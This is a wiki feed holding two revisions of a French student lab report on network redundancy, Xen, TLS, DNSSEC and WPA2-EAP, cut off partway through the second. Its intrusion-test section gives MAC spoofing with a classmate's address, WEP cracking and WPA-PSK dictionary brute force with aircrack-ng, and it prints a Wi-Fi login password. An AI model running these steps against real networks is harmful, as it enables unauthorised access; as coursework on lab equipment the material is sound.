Wiki d'activités IMA - Contributions de l’utilisateur [fr]

https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&feedformat=atom&user=Ebourre Wiki d'activités IMA - Contributions de l’utilisateur [fr] 2026-04-24T15:56:12Z Contributions de l’utilisateur MediaWiki 1.29.2 https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23414 TP sysres IMA2a5 2015/2016 G6 2015-11-27T15:35:09Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>1</th><th>default</th><th>172.20.99.0/24</th><th>172.20.99.252</th><th>172.20.99.254</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> <br /> <h3>Sécurisation de serveur DNS par DNSSEC</h3><br /> <br /> <pre><br /> cd /etc/bind<br /> vim named.conf.options ==> rajout de l'option dnssec-enable yes;<br /> mkdir hunt3r.dnssec<br /> cd hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec<br /> Je renomme les fichiers créé en : <br /> *hunt3r-ksk.key<br /> *hunt3r-ksk.private<br /> *hunt3r-zsk.key<br /> *hunt3r-zsk.private<br /> J'inclus dans le fichier db.hunt3r : <br /> *$include /etc/bind/hunt3r.dnssec/hunt3r-ksk.key<br /> *$include /etc/bind/hunt3r.dnssec/hunt3r-zsk.key<br /> dnssec-signzone -o hunt3r.lol -k hunt3r-ksk ../db.hunter hunt3r-zsk<br /> Modification du fichier named.conf.local ==> db.hunt3r.signed<br /> service bind9 restart<br /> Copie de la clé KSK sur le site de gandi dans l'onglet gérer DNSSEC<br /> </pre><br /> <br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre><br /> <br /> <h3> Sécurisation Wifi par WPA2-EAP </h3><br /> <br /> Maintenant je vais m'attaquer à la protection de l'accès à la borne Wifi de façon à ce qu'il soit controlé par WPA2-EAP. <br /> Pour cela je me connecte à ma VM et je réalise la configuration:<br /> <pre><br /> apt-get install FreeRadius<br /> cd /etc/bind/freeradius<br /> Modification de 3 fichiers :<br /> vim eap.conf<br /> default-eap-type = peap<br /> vim client.conf<br /> client 172.20.99.0/24<br /> {<br /> secret = secret_Werewolf<br /> shortname = wifi<br /> }<br /> vim users <br /> On enlève les commentaires au niveau de John Doe et de son mot de passe, de cette façon on aura un utilisateur.<br /> <br /> telnet 172.20.99.5<br /> aaa new-model<br /> aaa authentication login eap_Werewolf group radius_Werewolf<br /> radius-server host 193.48.57.8 auth-port 1812 acct-port 1813 key secret_Werewolf<br /> aaa group server radius radius_Werewolf<br /> server 193.48.57.8 auth-port 1812 acct-port 1813<br /> <br /> dot11 ssid SSID_WEREWOLF<br /> vlan 8<br /> authentication open eap eap_Werewolf<br /> authentication network-eap eap_Werewolf<br /> authentication key-management wpa<br /> <br /> encryption vlan 8 mode ciphers aes-ccm tkip<br /> <br /> ssid SSID_WEREWOLF<br /> int dot11Radio 0.8<br /> en <br /> encapsulation dot1Q 8<br /> bridge-group 8<br /> exit <br /> int gig0.8<br /> en<br /> encapsulation dot1Q 8<br /> bridge-group 8<br /> exit<br /> <br /> Pour avoir accès depuis mon PC :<br /> <br /> vim etc/network/interfaces<br /> <br /> auto wlan0<br /> iface wlan0 inet static<br /> wpa-ssid SSID_WEREWOLF<br /> wpa-key-mgmt WPA-EAP<br /> wpa-identity NirkasHunt3r<br /> wpa-password Phil.ze.beat<br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> </pre><br /> <br /> J'arrive à accéder à n'importe quelle adresse de mon réseau. Cependant je n'arrive pas à aller sur internet.<br /> <br /> Cela est résolu grâce à cette commande : <br /> <br /> <pre><br /> wget http://193.48.57.34/dns<br /> </pre><br /> <br /> Nickel ! Tout fonctionne !</div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23396 TP sysres IMA2a5 2015/2016 G6 2015-11-27T14:06:01Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>1</th><th>default</th><th>172.20.99.0/24</th><th>172.20.99.252</th><th>172.20.99.254</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> 